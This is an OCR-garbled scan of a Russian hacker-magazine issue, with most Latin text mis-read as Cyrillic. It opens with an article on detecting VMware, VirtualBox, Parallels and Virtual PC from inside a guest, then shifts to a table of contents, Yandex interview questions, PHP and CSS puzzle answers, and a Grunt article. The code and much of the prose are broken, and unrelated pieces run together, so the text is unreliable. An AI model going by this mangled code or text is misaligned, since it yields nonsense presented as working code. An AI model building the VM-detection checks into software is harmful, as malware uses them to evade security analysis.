сетевой карты определяют ее производителя. Производители 
виртуальных машин в этом плане не исключение: 


\/Миаге (\Ммаге Могк${а{1оп) 
00:05:69 
00:0с: 29 
00:1с:14 


Комигиьютер\ НКЕУ ГОСА_МАСНИЧЕНАЯОМАВЕО$СЯР ПОМ учет 


Использование МАсС-адреса для идентифи- 
кации производителя сетевой карты — 
довольно ненадежный способ 


9> 


А ОБ] - Зузи\егп 
Ее Мем Нар 


Ма/!игаге 


а. ъ \ 
‚-- АгсМате 
р № ВазеМате4ОБесЕ; 


:..№ КетеЮЩесь 
:.- № КпомилбИ5 

:.- № КпомиОИз32 
№ ОБесТурез 

:.. Ш ВРС Сопно! 


[@ <ТОВАбЕМоштеЁ (а... 
[@ <ТОВАСЕМоште а... 


[тер 


[@умв2имв21 8284192... 


[@умс 


[2 у5в=воотТ_НУВ24&... 


Туре 

ЗутБойсИпК 
бутБойсИпк 
бутройсИпк 
бутБойсИпк 
бутБойсИпк 
бутьойсИпк 
бутБойсИпк 
бутБойсИпк 
бутБойсИпк 
бутройсИпк 
бутБойсИпКк 
ине 


бутИпк 
\Бемсе\9е\1ЧеРоч0 
\Бемсе\Че\1ЧеРо1 
\Вемсе\9е\ЧеРон2 
\Вемсе\Зесагу 
\Вемсе\5РВемсе 
\Эемсе\$5рОги 


\Оемсе\Нагаои5К\Уоит... 
\Вемсе\Нагаа!К\о!иит... 


\Эемсе\Тер 
\Вемсе\00000046 
\Вемсе\Мир 
Йо 


р ЗутБойсИпк 
:--№ ИМОЕСоппипипсанопРой 
в. ‚№ МИпдоми; 

В} МИпаоманопз 


ыы 


[а] Мо!МагСопго! 
[@\Уоште(а895с44-а51... бутБойсИпк 
Ра] Мо!итЕ(а395с45-а51... ЗутБойсИпк 
\СГОВА!??\ВооЕ#М5_РРРОЕМИМИРОВТ:0000#{сас88484-7515-4с03-82е6-71а87аБас361 } 


ен 


00:50:56 


М1тсго$оЕЕ (\1г%иа1 РС) 
00:03: ++ 
00:04: За 
00:50:22 
7с:1е:52 
00:12 :5а 
00:15:5а 
00:17: Ра 
28:18:78 
7с:еа:8а 
00:14:48 
00:22:48 
00:25:ае 
60:45 :Ба 
0с:64:с4 


Огас1е (\1гфиа1Вох) 
08:00:20 


Рага11е15 (Рага11е15 МогК$фае1оп) 
00:1с:42 


Вытащить эти первые три байта из МАС-адреса нам помо- 
жет АР!-функция СыАдарегз што: 


// Подключаем либу, в которой содержится нужная 
// нам функция 
#1пс1и4е <1рИ1рар1.И> 
#ргаёта соттеп* (116, 


"ТРНЕРАРТ . 11") 


// Определяем размер буфера под данные, 


// возвращаемые функцией 
беЕАдарЕег$ТпФо (АдарегТпфо, &ОчЕВиЕ еп); 


// Выделяем память под данные об адаптере 
АаарфегТиРо = (РТР_АБАРТЕК_ТМЕО) <> 
пем( свпаг [ОчЕВи+Ёеп]); 


// Получаем информацию об адаптере 
беЕАдарЕег$ТпФо (АдарегТпфо, &ОчЕВи еп); 


// Сравниваем первые три байта МАС-адреса 


// с 900:1с:42 (Рага11е1$ МогК$фа*1оп) 


1+ (((ВУТЕ)АдареегТпио->Адагез [90] == 90х00) && «+ 
((ВУТЕ)Адар\егТиФо->Адаге$$[1] == @х1с) && «= 
((ВУТЕ)Адар*егТио->Адаге$$[2] == @х42)) { 


де1ете (АдарегТп+о); 
// Мы под Рага11е15$ могк$фаЕ1Топ 
гефиги гие; 
} е15е { 
Че1ете (Адар*егТи+о); 
гефигп Фа1$е; 


\Оемсе\УВохбиез+ 
инета 


рейсе оо Сота 
\Эемсе\Нагда!К\Уоиит... 
\Вемсе\Нагач1К\Уо|игт... 


«Подозрительные» 
объекты в\Уй+иа!Вох 


БУ 


На диске лежат исходни- 
ки функций, реализу- 
ющие все описанные 

в статье способы детекта 
виртуальных машин. 
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ВСПОМОГАТЕЛЬНЫЕ ПРОЦЕССЫ, ОКНАИ ДРУГИЕ 
«ПОДОЗРИТЕЛЬНЫЕ» ОБЪЕКТЫ 

Для нормальной работы практически все виртуальные машины 
требуют установки дополнений к гостевой операционной си- 
стеме, например УВохбиечАдащоп для УтиаВох или Рага!е!$ 
Тоо!$ для Рага!е!$ \ММогк$аНоп. Без этих дополнений работа 
с виртуальной машиной несколько затруднительна (ни тебе 
нормального разрешения экрана и полноэкранного режима, 
ни взаимодействия с Ч$В-девайсами, ни нормальной настрой- 
ки сетевых подключений). В общем, все производители вир- 
туалок не рекомендуют использовать их без этих дополнений. 
А эти самые дополнения оставляют очень заметный след в виде 
запущенных процессов: 


\МииаВох Рага!е!$ М/огкЗайоп 
\/ВохГгау.ехе рИ_сс.ехе 
\/ВохЗегмсе.ехе ри 100915.ехе 

Миа! РС Зпагеай\Арр.ехе 
умтизгус.ехе \/М\мгаге \Могк$айоп 
утзгус.ехе \упттоо|5А.ехе 


Для поиска процесса по имени мы воспользуемся функци- 
ями СгежеТоойер3 2$ парзПо{, Ргосез$32Рг$ и Ргосез$32Меж(: 


#1пс1иае <Т1йе1р32.Н> 


// К примеру, ищем процесс ут®оо1$4.ехе 

испаг_ + \МмагеРгосе$$Мате[] = {1"утеоо01$4.ехе"}; 
РВОСЕ$ЪЕМТКУЗ2 ре; 

НАМОЕЕ И5пар5Пот; 

Ю5пар$Пое = СгеаеТоо1Йе]р325$парзПо* 
(ТНЗ2С$_5МАРРКОСЕ$$, 90); 

ГегоМетогу (&ре, °1хеот(РКОСЕ$ЗЕМТВУЗ2И)); 
ре.Ч9м517е = °1хео+(РВОСЕЗ$$ЕМТВУЗ2М) ; 
Ргосе$$32Е1г5+ (И5паръНо*, &ре); 


до { 
1+ (тетстр(ре.57ЕхеЕ11е, \/МмагеРгосезМате, «> 
24) == гесигп гие; Мы под \УМмаге 


} 
ий11е (Ргосе$$32Мех* (И5пар$По*, &ре)); 


Помимо непосредственно самих процессов, демаскирую- 
щим признаком могут стать окна, открытые этими процессами. 
Окон в каждой из рассматриваемых виртуальных машин может 
быть довольно много, и все ихмы перечислять не будем, а огра- 
ничимся одним или двумя. 


Итак: 
Открытые окна для 
\УМугаге (красным \1гЕца1Вох 
выделено окно \/ВохТгауТоо\пЧС1а$$ 
класса\УМ$ мисн- Рага11е1$ МогКк$фаЕ1оп 
УзегСопиго!С!а$$) СРТифегсерфог 
№ Потоки Й Дескрипторы © Драйверы 
\Я Свойства [Й Версия ® оц [р Файлы #5 Соединения 24 Производительность } Статистика Г] Окна 


[М Перечислить невидимые окна [У] Перечислить служебные окна 


Заголовок окна 


— | Упйубей ор\МИтадомибгоир\Итдоми 
— | биеНозиедганоп\И пом 


— | УМОрауСвапдеСотто Пе 
| т МУСТНМЕ 1 
4 


Разм... По... Класс 
0,0-0,0 М аОей\МпаС!а$5 


Видимое Состояние 


[ Невидимое \/ Разрешено 00 


— тив Тоо!... 
(№ УМмлаге Тоо... 


ы Разрешено о, 0-0, 0 ОибСопго!С1а5$ 

\/ Разрешено 00 0,0-0,0 УМмхагебгаде Мпа Са; 

%! Разрешено  124х36 311,2... /пйубе ор\МптдомибгоирСа$ 
\/ Разрешено  124х36 345,2... биебНозНиедгаНопСа5$ 

%/ Разрешено 00 0,0-0,0 УМумагеТгаусоп 

%/ Разрешено 00 0,0-0,0 УМО5р!ауСпапдеСопго! С !а55 
© отключено _ 00 _  0.0-0.0 МЗСТНМЕ Л 


(ФУМмаге Тоо1... 
(№) УМмиаге Тоо1... 
(ФУМмаге Тоо1... 
(ФУМмаге Тоо... ^^ 
1 УМумаге Тоо1... ^^ 


и 


Для нормальной работы почти все вирту- 
альные машины требуют установки допол- 
нений к гостевой операционной системе 
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В УМигаге УГопс$аноп для взаимодействия 
гостевой и основной операционных систем 
реализован небольшой бэкдор в виде порта 


с номером 0х5658 


БезК*орИ{111{е5 

\1гЕца1 РС 
{90843Е001-1028-44а3-В110-ЕЗАЭЗА85ЕАЭб6 } 
\УМмаге МогК$а{1оп 
\УМ$и1тЕсиУ5егСоп{го1С1а$$ 


Найти окно по имени класса очень просто — для этого есть 
функция Епо\М/паому: 


//_К примеру, ищем окно для \Ммаге 
НИМО \Ммагем1паом = Е1тпа\1пЧомА < 
("УМ$итЕспУегСопЕго1С1а$5", МИЕЕ); 


1+ (УМиаге\1паом != МУЕЕ) гефиги гие; // Мы под 
// ММмаге Шогк$фаЕ1оп 


Помимо процессов и окон, указывающих на наличие ВМ, 
можно найти и другие «подозрительные» объекты — например, 
если покопаться в гостевой ОС виртуальной машины утилитой 
МИпОБ] или какой-нибудь аналогичной, то можно найти вот та- 
кие объекты: 


\1гЕца1Вох 
\Оеу1се\\УВохМ1п1тКагом 
\Оему1се\\Вохбиче$ 
Рага11е1$ ИогК$фаЕ1оп 
\Бем1се\рг1_ру 
\Бем1се\рг1_ 12 
\Оеу1се\рг1_11мте 
\Оеу1тсе\Рг]1МетО)еу 
\Оеу1се\Рг]1МетбемРс1 
\Оеу1се\Рг]1Метб)еу 
\1гЕца1 РС 
\Эем1се\\У1гЕца]1Масй1пе$егу1се$ 


Проверить наличие «подозрительного» объекта совсем 
несложно, достаточно попытаться открыть его с помощью 
СтемеЕ!е: 


// К примеру, проверяем \1гиа1Вох 

1+ ((СгеаЕеЕ11е(1"\\\\. \\УВохМ1п1КагоМ", @, 6, «+: 
@, ОРЕМ_ЕХТУТТМ@, 9, 0) != ТМУАЕТО НАМОЕЕ_МАТУЕ ) «= 
|| (Сгеажер11е(ь"\\\\. \\\/Вохбиез*", 6, 6, 6, «: 
ОРЕМ_ЕХТЪТТ№б, @, 09) !=ТММАЕТО _НАМОЕЕ_\МАЕОЕ)) <= 
геригип фгие; // Мы под \М1гЕица1Вох 


ЧТО ЕЩЕ «ПОДОЗРИТЕЛЬНОГО» 

МОЖНО НАИТИ В РЕЕСТРЕ? 

Помимо признаков наличия специфического оборудования, 
в реестре можно увидеть и другие следы, оставляемые вир- 
туальными машинами. Некоторые из них базируются в ветке 
НКЕМ\НААОМ/ААЕ\АСРГОЗОТ. Достаточно в этом месте прове- 
рить наличие таких вот ключей: 


\М\иа!Вох Миа! РС 
УВОХ__ АМ!В| 

РагаЙе!$ \ММогк$аНоп \/УМмгаге М/Могк$аНоп 
РА $ __ РТМ. , 


Проверку реализуем так же, как мы проверяли наличие 
определенного оборудования. Просто делаем попытку от- 
крыть нужный нам ключ и, в случае успеха, делаем вывод о на- 
личии ВМ. 


АА 


о. |у/9ОХИ — очень хо- 


рошая статья про детект 
виртуалок. Единствен- 
ный ее недостаток — она 
на английском языке. 


Ключ РНЕ$__ вреестре 
РагаНе!$ ММогктаНоп 


9 


а № Компьютер 
| НКЕУ_СА$5Еб _ПООТ 
› № НКЕУ СУАРЕМТ ИЕР 
«|! НКЕИТОСАЕ МАСНМЕ 
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ВОЗМОЖНОСТИ, ЗАЛОЖЕННЫЕ ПРОИЗВОДИТЕЛЕМ 
Некоторые производители (в частности, УМ\маге и Мсгоз$ой) 
специально реализуют возможности управления своими про- 
дуктами, которые можно использовать для наших целей. 

В Мйчца! РС используются инвалидные (не «инвалидные», 
а «альтернативно одаренные». И вообще-то они «недействи- 
тельные». — Прим. ред.) команды процессора с опкодами ОхОЕ 
ОхЗЕ 0х07 и ОхОВ, попытка выполнения которых на реальном 
процессоре вызовет исключение, в то время как на Ущиа! РС 
все пройдет нормально. С помощью этих команд можно доста- 
точно просто задетектить виртуалку от Мсго$о0й: 


гу 4 
__ азм { 
хог ебх, ебх 
шоу еах, 1 
__ ет1* (9х@Р) 
__ ет1 (9хЗЕ) 
__ ет1* (0х@7) 
__ет1* (@х@В) 


} 
гефиги гие; // Мы под \1гица1 РС 


} 
ехсер* (ЕХСЕРТТОМ_ЕХЕСУТЕ_НАМОЕЕВ) гефигп +а15е; 


В УМмаге \Могк$айоп для взаимодействия гостевой и ос- 
новной ОС реализован небольшой бэкдор в виде порта с но- 
мером 0х5658. Для его использования необходимо в ЕАХ 
ПОЛОЖИТЬ «магическое» число 0х56445868 (в символьном 
представлении — «\/МХп»), а в ЕСХ записать одну из команд 
взаимодействия гостевой и основной ОС (например, команда 
ОхОА возвращает версию установленной \/Ммиаге \МогкЗаноп). 
Короче, выглядит все это приблизительно так: 


НЕНь 28 
азт + ЕЕ 
тоу еах, 0х56445868 
шоу есх, 9х9А 
тоу еах, 0х5658 
1п еах, ах 


| 


гефигп фгие; // Мы под \Ммаге 


} 


__ехсер* (ЕХСЕРТТОМ_ЕХЕСУТЕ_НАМОЕЕВ) гефигп +а15е; 


ЗАКЛЮЧЕНИЕ 

Как видишь, признаков, характерных для виртуальных машин, 
предостаточно, и для того, чтобы их увидеть, сильно глубоко ко- 
пать совсем не нужно. = 


|| Имя Тип 
25] (По умолчанию) ВЕб_52 


РГС\ЛЕ\/ 


ПУБЛИЧНАЯ ПОРКА 
ПИНГВИНА 


Недавно случилась довольно неприятная исто- 
рия с 0-Чау-уязвимостью, всплывшей сразу во 
всех версиях ядра ИШпих, выпущенных за послед- 
ниетри года. В связи с этим мы проанализиро- 
вали все самые серьезные и опасные уязвимо- 
сти в Ипих за последнее время. Причем в обзор 
попали дыры не только в ядре, но и в других под- 


системах, включая дй0с, Х-сервер и не только. 


ОмМХОгО 


[5 ОмМхХоОгО 


кодинг 15“ Кодинг 


ОГНЕННЫЙ ЗАНАВЕС КУШАТЬ ПОДАНО! АМСОГАН5: ФРЕЙМВОРК, 

|рфаЫе$ остается одним из самых мощных Веб-проекты становятся все функциональнее КОТОРЫЙ НАМ НРАИЦА 

и важных инструментов безопасности в Ипих- и сложнее, а значит, усложняется и процесс их И снова }$-фреймворки. На этот раз изучим 

системах. Давай поговорим о некоторых его разработки. Для того чтобы сделать работу с па- детище Сооде. Благодаря простоте использова- 

возможностях. кетами проше, были придуманы специальные ния этот продукт может заставить тебя взглянуть 
системы сборки — вроде Сгит+. на разработку на $ совсем иначе. 


кодинг 12 5УМ/АСК 5УМ/АСК 


ПРАВИЛЬНАЯ МНОГОПОТОЧНОСТЬ БУБЕН НА ПРОКАЧКУ СПОСОБНЫЕ ПОДМАСТЕРЬЯ 

Если ты хочешь добиться от своего приложения Представляем твоему вниманию новый подход Обзор самых полезных плагинов, аддонов 
высокой производительности, асинхронное про- к привычным и хорошо изученным инструментам и инструментов для популярных МуЗОЕ, Мад!о$ 
граммирование — твой выбор. Давай посмо- в арсенале администраторов систем под управ- и 5пой, добавляющих в привычные продукты 


трим, как это делается. лением *пх. интересный функционал. 
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ЗАДАЧИ НА 
СОБЕСЕДОВАНИЯХ 


СПЕЦПОДГОН: ЗАДАЧИ ОТЯНДЕКСА 
(СПОИЛЕР: УАМОЕХ.ВО, УА.ВО) 

Если ты думаешь, что админы голландской ком- 
пании «Яндекс» только и делают, что получают 
миллионные зарплаты и посещают квартал крас- 
ных фонарей и кофешопы, то ты таки неправ. 
Прослушай информацию из первых рук! 

В Яндексе системные администраторы об- 
ладают достаточно широким кругозором, так 
как им приходится заниматься архитектурой по- 
стоянно растущих по нагрузке сервисов, искать 
проблемы, автоматизировать свою работу, на- 
страивать различные приложения и решать ряд 
других не менее интересных задач. 

На собеседованиях мы спрашиваем достаточ- 
но много всего, чтобы понять, в каких вопросах 
кандидат силен, и определить, в какой области 
ему будет интереснее работать. Если ты придешь 
к нам на собеседование, то надо быть готовым 
к тому, что тебя спросят про ТСРЛР и вообще 
про различные сетевые технологии, про устрой- 
ство операционной системы УМХ, про твой опыт 
программирования на различных скриптовых 
языках, про веб-серверы, базы данных и другие 
приложения. Также могут предложить спроекти- 
ровать небольшой отказоустойчивый и масшта- 
бируемый сервис, например сервис по отдаче 
множества статических картинок. 


Ниже — несколько задач, которые мы обычно 
задаем. 


1. Классический вопрос: что такое ВАО 10 
иВАШО 0+1? 

Обычно мы спрашиваем, в чем разница, какой 
из них лучше и почему. 


2. Вопрос про сети. 

Два приложения в разных дата-центрах обмени- 
вались данными по протоколу прикладного уров- 
ня, использующему в качестве транспорта про- 
токол ТСР по выделенному каналу с пропускной 
способностью 10@. Природа приложения такова, 
что данные сначала накапливаются в большом ко- 
личестве, а потом прикладным уровнем переда- 
ются с максимальной интенсивностью. При этом 
максимальная наблюдаемая скорость передачи 
данных между ними не превышала 200 килобайт 
в секунду. После перемещения серверов, на кото- 
рых работают эти приложения, в один дата-центр 
скорость передачи данных возросла на поряд- 
ки. Предложите объяснения этому наблюдению. 
Что можно было бы предложить для исправления 
ситуации до переезда серверов? 


3. Протокол НТТР$ сейчас получает все 
большее распространение и популярность. 
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Воттипичный вопрос про сертификаты. 
На 1.2.3.4: 443 по протоколу НТТР$ отвечают: 
. Юраг1|; 

‚ ТЮо0.ес; 

. раг.ад. 


Сколько должно быть сертификатов для этих 
веб-сайтов и что должно в них быть прописано со- 
гласно ВЕС, чтобы браузеры могли им доверять? 


4. Совсем простой вопрос про Ба$П: какин- 
крементировать (увеличить наединицу) 
переменную «а» в Ба$зп? 


5. Какая утилита позволяет узнать 
названия библиотечных функций, 
используемых программой 

в процессе исполнения? 


6. Нуи наконец, классический вопрос, 
который любим не только мы: расскажите, 
как происходит процесс загрузки Ипих 
отвключения компьютера. 

Просим рассказать про стадии загрузчика нах86, 
что такое шк, как он создается и зачем он нужен, 
про ирЗам/зузчета — какие у них принципы ра- 
боты и в чем их преимущества перед обычными 
шпИ-скриптами. 
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ОТВЕТЫ НА ЗАДАЧИ ОТ 5ОЕТЫМЕ ИЗ ПРОШЛОГО НОМЕРА 


1. ЧТО ВЫВЕДЕТСЛЕДУЮЩИЙ СКРИПТ 
ИПОЧЕМУ? 


УСЛОВИЕ 
<РрИир 
$5\аг1 = "Не11о, мог1а!"; 


Мага = "" 
$$\аг3 = ""; 


ФипсЕ1топ +001 () 


210оба1 $$\аг1, $$\аг2; 
$°\аг2 = &$$\/аг1; 


} 


ФипсЕ топ +оо2() 


510Ба1 $$\аг1; 
$СЕОВАЕ$ [ "5\/аг3"] = &$$\аг1; 


} 
ее 0 
еспо "5$\аг2 = '$$\/аг2'\п"; 
Фоо2(); 
еспо "$5\аг3 = '$$\/аг3З'\п"; 
р» 
ОТВЕТ 
$\аг2 =" 


э\аг3 = "Нео, мопа!' 

Объяснение: на самом деле в локальных про- 
странствах имен все переменные, объявленные 
как аора!, являются ссылками на элементы су- 
перглобального массива ФОГОВАЕЗ$[уайаЫе_ 
пате']. А при присвоении этим ссылкам других 
ссылок связь с суперглобальным массивом теря- 
ется. 


2.ЧЕМУ БУДЕТРАВНО ЗНАЧЕНИЕ ПЕРЕ- 
МЕННОЙ $А? 


УСЛОВИЕ 
а) Фа = (11) ( (0.1+0.7) * 19 ); 


6) Фа = 90; 
фа += ++$а; 


ОТВЕТ 

а: 

Объяснение: рациональные числа, которые мо- 
гут быть точно представлены в виде чисел с пла- 
вающей точкой с основанием 10, например, 0.1 
или 0.7, не имеют точного внутреннего представ- 
ления в качестве чисел с плавающей точкой с ос- 
нованием 2, вне зависимости от размера мантис- 
сы. Поэтому они и не могут быть преобразованы 
в их внутреннюю двоичную форму без небольшой 
потери точности. Соответственно, результат сло- 
жения вернет по сути 7,9999999999... При ум- 
ножении и приведении к целочисленному типу 
дробная часть отбросится. 


6) 182 

Объяснение: в момент присвоения переменной 
фа значения префиксный инкремент уже увеличит 
ее значение (согласно приоритетам операций). 
Соответственно, получится 91 + 91 = 182. 


3.ЧТОВЫВЕДЕТСЛЕДУЮЩИЙ КОД? 


УСЛОВИЕ 
<?рИр 


.гесфапё1е:Бефоге { 
Богаег-Бо{Тот: 59рх $0114 #23В7Е4Д; 
Богаег-1е+:50рх $011а #+++; 
Богаег-г1ё1*:50рх $0114 #++Т; 


} 


.гесфапё1е: а ег { 
Богаег-фор:5@рх $0114 #238В7Е4; 
Богаег-1е+*:50рх $0114 #+++; 
Богаег-г1ёй*:5@0рх $0114 #++Т; 
таг51п:5@0рх @ 0 0; 


фа = аггау(1=>10, 2=>20, 3=>30); 
$6 = &$а[1]; 
$ а[1] = $а[2]; 
$а[1] = &$а[3]; 
есйо $6; 
ра 


ОТВЕТ 

20 

Объяснение: при присвоении переменной, явля- 
ющейся ссылкой, значения другой ссылки, связь 
теряется. Переменная, на которую была ссылка 
до присвоения, останется при своем значении. 


4. КАКИМИ СПОСОБАМИ МОЖНО ПОЛУ- 
ЧИТЬРОМБ СРЕДСТВАМИ С$$ И НТМЕ? 


Ф 


ОТВЕТ 
Способ 1: 


Рис. 1. Ромб, который надо 
нарисовать 


.гесфапё1е 
и1аеи:100рх; ПезёИ*:100рх; 


| 
5. ИСПРАВЬ БАГИ 


УСЛОВИЕ 

Исправьте имеющийся код, чтобы получить ре- 
зультат на картинке. Полученный код должен ра- 
ботать в последних версиях браузеров Спготе, 
Егетох, Затап, Орега, а также 1Е9, 1Е10. 

Что в приведенном коде является неправиль- 
ным и почему? Удалось ли вам получить идентич- 
ный результат во всех браузерах? 

Данная задача была протестирована в брау- 
зерах 1Е9Э, 1Е1О, \М/таоми/$ Затап 5.1.7, Орега 12.15, 
Нгетох 20.0.1, Спготе 26.0.1410.64. 


Рис. 2. Результатвыпол- 
нения кода из задачи про 
исправление багов 


Исходный код: 


<!БОСТУРЕ И%м1> 


<Ит1 > 
<Веаа> 


Баскёгоипа : #02с22; 


<{1{1е>$оте +1%1е</+1{1е> 


-меБК1*-+гап$Фогт: гофаЕе(-454е?); 


<тефа ИЕр-еди1у="Сопфепт*-Туре" «= 


-102-Егап$+огт: гофа*е(-454ев); 


сопфепт="Еехе/И{т1; спагзеф=иЕ+-8" /> 


-т5-{гап$Фогт: го\ате ( -454е?); 
-о-Егап5$Фогт: гота*е( -454е?); 


<5{У1е фуре="ехЕ/с55"> 


ЕгапФогт: гофа{е(-454е?); 


Боау { 


-меБк1* -ЕгапзФогт-ог121п: @ 100%; 


ра4а1 п; :100рх; 


-той-+гап$Фогт-ог151п: 0 100%; 


} 


-т$ -гап5Фогт-ог121п: @ 100%; 


-о-Егап$Фогт-ог151п: 09 100%; 
Егап$Фогт-ог151п: 0 100%; 


еее 
м1 АЕИ:200рх; 


} пе12НЕ: 100рх; 
Баскёгоипа: 11пеаг-вгад1епт*+ 
Способ 2: (+о Бофкот, #269ае2 0%, +: 


.гесфапа1е { 


#83сее2 100%); 


Баскёгоипа :#2387Е4; 


В]%ег: ргоё14а:ОХТтавеТгап$Фогт . == 


ит ай: 1@00рх; 


М1сго5о-+ . згад1еп + + 


е1 51 :100рх; 


($фагЕСо1ог$%г='#269ае2', + 


} 


епаСо1ог$г='#83сее2", «= 


. гесфапё1е:Бефоге, „гесфапё1е:аег { 


бгад1еп{Туре=0 ); 


сопфепт: р 


итаеи:0; 


Ве1эН*:0; 


со1ог:#++; 


Тех -а11еп : сепфег; 
11пе-Ветепт :100рх; 


роз11оп : аб 5о1и*е; 
} 


Фопф:18рх беогр1а, зег1; 


Яндекс: «Если ты придешь к нам на собеседование, то надо быть готовым 
к тому, что спросят про различные сетевые технологии, про устройство ОМХ, 
про опыт кодинга на скриптовых языках, про веб-серверы и базы данных» 
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фехЕ-°Падош: @ 1рх 2рх #00437А; 
Богаег-гаа1и$ :20рх; 
Богаег:1рх $0114 #3Е70С9; 
соптепт: 'Не11]о Мог1а'; 


| 
</5$у1е> 


</Пеаа> 


<Боду> 
<Ч1у с1а$5="е]етеп*" > 
</а1\> 

</Боду> 


</Вт1> 


<!БОСТУРЕ Ит1> 


<Ит1 > 

<Ппеаа> 
<{1{1е>5оте 11%1е</{1{1е> 
<тефа Ир-еди1\у="Сопфеп*-Туре" += 
соптепе="фехЕ/П{т1; сПпагзеф=и+-8" /> 


<5у1е фуре="ехЕ/с$5"> 
Боду { 
раа491п5 :100рх; 
} 


.е1етепе { 
м1 ап :200рх; 


Пе15р* : 100рх; 

Баскёгоипа: -мерк1{-5га@1епт®+» 
(11пеаг, 1еёЕ фор, ЛефЕ Боот, += 
со1ог-$%ор(0%,#269ае2), со1ог-$Кор«=- 
(100% ,#83сее2)); 


Баскёгоипа: 11пеаг-вга@1епт{+ = 
(Ео Боффот, #269ае2 0%, «=: 
#83сее2 100%); 


В]Фег: ргодёта:ОХТтавеТгапт$Фогм. == 
М1сго$о+® .вгад1епт*( $фагЕСо1ог$г=е 
'#269ае?', епаСо1ог${г= '#83сее2 ' ‚+= 
бга91еп{Туре=0 ); 


со1ог: +; 

фехЕ-а1121п : септег; 

Фоп* :18рх/100рх беогё1а, зег1{; 
фехЕ-$°Падом: @ 1рх 2рх #00437А; 
Богаег-гаа1и$ : 209рх; 

Богаег:1рх $0114 #3Е70С9; 


} 


.е1етепе:а+%ег { 
соптепт: 'Не11о Мог1а’; 


| 
</5$у1е> 


<!--[1+ ТЕ 9] > 
<5фу1е фуре="ехЕ/с$$"> 
.е1етеп{ { 
Баскёгоипа: #269ае2 «= 
иг1(. /1таге$/Ь=_1е.рпй) «= 


СЛАВИМ ЧИТАТЕЛЯ-РЕШАТЕЛЯ! 


Читатель Святослав Соболь из Москвы прислал 
нам следующее решение: 


ЗАДАЧА № 1 (<На е.пе/О70УС/3/) 


\уаг уаг1аб]е = 


КипсЕ1оп +о00(_уагта61е ) { 
а1ег* ( (РипсЕ1оп()1 


гефигп уагтабБ]1е + 


етО{пегРагЕОРРИгазе(); 
РЕБЕ» |}: ЕВА ЕЕЬ РИ 
} 


РипсЕтоп геЕОЕПегРагЕО{РИгазе 
гебигп уаг1аЪ]е; 


С Е Е НИЕ 
оо ( у 
ЗАДАЧА № 2 (|5паде.пе!/УС\А//б/) 


НТМЬ : 


<Авиге> 
<1т8/> 


<ЯгсарЕ1оп>подпись< /Ягсаретоп» 


</Явиге> 


<Ягиге» 
<1т8/> 
<ЯвсарЕТоп>подпись подпись 
</Нвсар1оп> 

</Явиге> 


($5: 


Имитируем картинк 
11$ { 
Баск=гоипа: гау; 
рааа1 пе: : 
ЗЕ ЗИ ОБ ое 


пгиге, 
Иосаре1оп { 

15р1ау:Б1оск; 
ее вы ЕЕ 


пгиге { 

Ноа* : 1е+*; 

ро$1%1оп: ге1аЕ1уе; 
Е ка ке ЕНЕНЕНННЬЫЕ 
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гереа{-х 9 100%; 
А] {ег : ргоё14 : ОХТтавеТгап$Когм . = 
М1 сго$о-+ . згай1епт* (епаб1ед=+а15е); 
} 
</5$у1е> 
< | [епа1+]--> 


</ПВеаа> 


<Боду> 
<1,у с1а55="е]1етеп*" > 
</а1м> 

</Боау> 


</ВЕт1 > 


Были внесены следующие исправления: 

1. Прописываем -мебкк-одга ет для заливки фи- 
гуры градиентом в ЗФатап, так как инструкция 
|пеаг-дгае в этом браузере не работает. 

2. те-песдиЕ:100рх; переносим в Тот. По умол- 
чанию если в ю\не определен параметр пе- 
пеюфщ, то берется значение по умолчанию, 
при этом перезаписываются все значения 
Нпе-пест, определенные ранее. 

3. сощепе’Нейо \Мопа’; выносим в отдельный 
класс с псевдоэлементом :аКег, так как свой- 
ство сощеп работает только в сочетании 
с :беТоге, :аНег. 

4. В условных комментариях заменяем градиент 
на картинку для ИЕЭ, чтобы избежать конфлик- 
та градиента и скругленных уголков, а также 
не забываем обнулить фильтр градиента либо 
удалить его из описания .@етепе {}. 

5. К сожалению, 1еж-5Падом/ не работает в ИЕ9Э. 
Сделать тень с помощью фильтра невозмож- 
но, так как тень присваивается блоку в целом 
и не наследуется текстом, определенным 
в конструкции .е@етеп:аНег { сощет:Нейо 
\Мопа'; }. = 


посареТоп + 
ро$1%1о0оп: аб5о1и{е; 
ВЕН 


По верстке а в частном случае предложенное 
решение верно, так как все условия задачи соблю- 
дены, однако оно обладает и недостатками. 

Не самый важный среди них — решение 
не кросс-браузерное. Например, в 1Е7 подпись 
и картинка ведут себя отлично от более современ- 
ных браузеров. 

Еще один недостаток заключается в том, 
что высота оберточного блока будет рассчитывать- 
ся браузером без учета высоты подписи к картинке 
(а подпись может оказаться высотой в 2, Зи боль- 
ше строк). Если вставить такой блок с картинкой 
и подписью в текст, то текст будет перекрывать 
подпись к картинке. Для практического примене- 
ния решение не вполне пригодно. 

Несомненный плюс — использование в реше- 
нии семантической разметки :). 


Несмотря на некоторые недочеты в реше- 
нии, Святослав, бесспорно, заслужил пригла- 
шение на собеседование и подарочный набор 
от Софтлайна! 
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Артём Сапегин 
Вадоо, 


Используем СгипЕ для облегчения жизни фронтенд-разработчика 


Современный сайт — это уже далеко не набор НТМ!Е-файлов и картинок с несколькими та- 
олицами стилей и скриптами, которые можно просто выложить на сервер как есть. Теперь 
для разработки используют множество инструментов: С$$-препроцессоры, минификаторы 
и склейщики скриптов, оптимизаторы картинок, генераторы спрайтов и многое другое. Запу- 
скать все руками быстро надоест, да и легко забыть что-то и наделать ошибок. Поэтому было 


бы неплохо это все автоматизировать. 


Навернякаты хотя бы разслышал слова «мейк» или «мейкфайл». 
Это файл (обычно онтаки называется: Макейе) сценария сбор- 
ки, очень похожий на $Пе!-скрипт. Система сборки читает этот 
файл и автоматически выполняет рутинные действия, экономя 
разработчику время и нервы. Маке — одна из самых известных 
и старых систем сборки. Ее используют суровые программи- 
сты для автоматизации компиляции программ и других повто- 
ряющихся процессов, чтобы не вводить каждый раз длинные 
и сложные команды в терминале. Кроме Маке, существует мно- 
жество других систем сборки — ВРаке, Саке, Апт. Все они имеют 
свои преимущества, но иу всех есть один общий недостаток — 
они не приспособлены для нужд Нощепа-разработчика. 
Конечно, при желании ты можешь приспособить любую 
из этих систем сборки для минификации +$ или компиляции 
СоНееЗсирф, но на выходе ты получишь громоздкий и негиб- 
кий инструмент, при этом потратив много времени. Куда удоб- 


Логотип Гранта. 


Готов съестьвсе, 
что угодно :) 


нее было бы использовать специально адаптированные тулзы 
для решения повседневных задач фронтендщиков. Наиболь- 
шей популярностью у девелоперов пользуется система сборки 


ОгийШ$ ( ), причем вполне заслуженно. У Гранта 
есть несколько плюсов, которые отличают его от других систем 
сборки. 


